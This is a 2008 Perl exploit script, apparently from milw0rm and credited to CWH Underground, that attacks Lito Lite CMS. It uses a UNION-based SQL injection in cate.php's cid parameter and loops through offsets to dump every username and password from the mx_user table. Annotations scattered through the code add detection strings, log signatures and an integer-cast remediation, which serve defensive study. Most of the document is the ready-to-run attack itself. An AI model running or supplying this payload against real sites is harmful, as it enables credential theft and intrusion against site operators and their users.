Lito Lite CMS cate.php cid Remote SQL Injection Exploit
1 #!/usr/bin/perl −w
2 #===========================================================
3 # Lito Lite CMS (cate.php cid) Remote SQL Injection Exploit
4 #===========================================================
5 #
6 # ,−−^−−−−−−−−−−,−−−−−−−−,−−−−−,−−−−−−−^−−,
7 # | ||||||||| ‘−−−−−−−−’ | O .. CWH Underground Hacking Team ..
8 # ‘+−−−−−−−−−−−−−−−−−−−−−−−−−−−^−−−−−−−−−−|
9 # ‘\_,−−−−−−−, _________________________|
10 # / XXXXXX /‘| /
11 # / XXXXXX / ‘\ /
12 # / XXXXXX /\______(
13 # / XXXXXX /
14 # / XXXXXX /
15 # (________(
16 # ‘−−−−−−’
17 #
18 #AUTHOR : CWH Underground
19 #DATE : 29 November 2008
20 #SITE : cwh.citec.us
21 #
22 #
23 #####################################################
24 #APPLICATION : Lito Lite CMS
25 #DOWNLOAD : http://www.lovedesigner.net/files/download/lito_lite.zip
26 ######################################################
27 #
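28 #Note: works only when the target's PHP runs with magic_quotes_gpc = off (the quote sent in cid must reach the SQL query unescaped)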
29 #
30 #######################################################################################
31 #Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
32 #Special Thx : asylu3, str0ke, citec.us, milw0rm.com
33 #######################################################################################
34
35
36 use LWP::UserAgent;
37 use HTTP::Request;
38
# Argument check: the script expects exactly two command-line arguments
# (<Target> and <Data Limit>). With any other count it prints the banner and
# usage text that follows and exits without sending any request.
39 if ($#ARGV+1 != 2)
40 {
41 print "\n==============================================\n";
42 print " Lito Lite Remote SQL Injection Exploit \n";
43 print " \n";
44 print " Discovered By CWH Underground \n";
45 print "==============================================\n";
46 print " \n";
47 print " ,−−^−−−−−−−−−−,−−−−−−−−,−−−−−,−−−−−−−^−−, \n";
48 print " | ||||||||| ‘−−−−−−−−’ | O \n";
49 print " ‘+−−−−−−−−−−−−−−−−−−−−−−−−−−−^−−−−−−−−−−| \n";
50 print " ‘\_,−−−−−−−, _________________________| \n";
51 print " / XXXXXX /‘| / \n";
52 print " / XXXXXX / ‘\ / \n";
53 print " / XXXXXX /\______( \n";
54 print " / XXXXXX / \n";
55 print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
56 print " (________( \n";
57 print " ‘−−−−−−’ \n";
58 print " \n";
# <Target> is the base URL of the Lito Lite installation (the script appends
# /cate.php itself); <Data Limit> becomes the upper bound of the request loop.
59 print "Usage : ./xpl.pl <Target> <Data Limit>\n";
60 print "Example: ./xpl.pl http://www.target.com/lito_lite 10\n";
# Exit here so nothing is sent when the arguments are missing.
61 exit();
62 }
63
# Normalise the target: only a leading "http://" is recognised; any other
# value (including an https:// URL) gets "http://" prepended unchanged.
64 $target = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0]: ’http://’ . $ARGV[0];
# <Data Limit> is taken as-is, with no numeric validation, and used as the
# loop bound for the number of requests.
65 $number = $ARGV[1];
66
# Console banner only; no network activity happens in these four prints.
67 print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++";
68 print "\n ..:: SQL Injection Exploit By CWH Underground ::.. ";
69 print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
70 print "\n[+]Dump Username and Password\n";
71
# Main loop: one HTTP GET per iteration. $start is concatenated into the query
# as the SQL OFFSET, so each request asks for a single, successive mx_user row,
# up to <Data Limit> rows. In access logs this appears as a burst of near-
# identical cate.php requests that differ only in the offset value.
72 for ($start=0;$start<$number;$start++) {
73
# A fresh LWP::UserAgent is created on every pass and no agent string is set,
# so requests carry the library's default "libwww-perl/<version>" User-Agent.
74 $xpl = LWP::UserAgent−>new() or die "Could not initialize browser\n";
# The cid parameter carries the whole injection: %27 is a single quote
# (presumably closing a quoted literal in cate.php's query -- the PHP source is
# not shown here), "and 1=2" empties the original result set, and the UNION
# supplies a 10-column row whose 4th column is
# ':::' + username + '::' + password + ':::' (0x3a is ':') read from mx_user.
# Detection: cate.php requests whose cid contains "union select",
# "concat(0x3a3a3a" or "mx_user".
# Remediation (application side): cast cid to an integer or bind it as a
# query parameter instead of concatenating it into the SQL string.
75 $req = HTTP::Request−>new(GET => $target."/cate.php?cid=1%27%20and%201=2%20union%20select 1,2,3,concat(0x3a3a3a,username,0x3a3a,password,0x
3a3a3a),5,6,7,8,9,10%20from%20mx_user%20limit%201%20offset%20".$start."−−+and+1=1")or die "Failed to Connect, Try again!\n";
# Send the request; the HTTP status is not inspected, only the body is used.
76 $res = $xpl−>request($req);
77 $info = $res−>content;
# 1-based row counter, used only for display.
78 $count=$start+1;
79
# The ':::' delimiters injected through concat() are what the script searches
# for in the returned page to locate the leaked row.
80 if ($info =~ /:::(.+):::/)
81 {
82 $dump=$1;
# Split the captured text on the inner '::' separator into the two fields.
83 ($username,$password)= split(’::’,$dump);
84 printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n";
85 }
# No marker in the response: the script stops at the first such page. Note that
# "Exploit Done" is printed in this branch even when no row was ever returned
# (for example against a patched or non-vulnerable site), so that message alone
# is not evidence of a successful extraction. The "or die" only fires if the
# print itself fails.
86 else {
87 print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n";
88 exit;
89 }
90 }
91
92 # milw0rm.com [2008−11−29]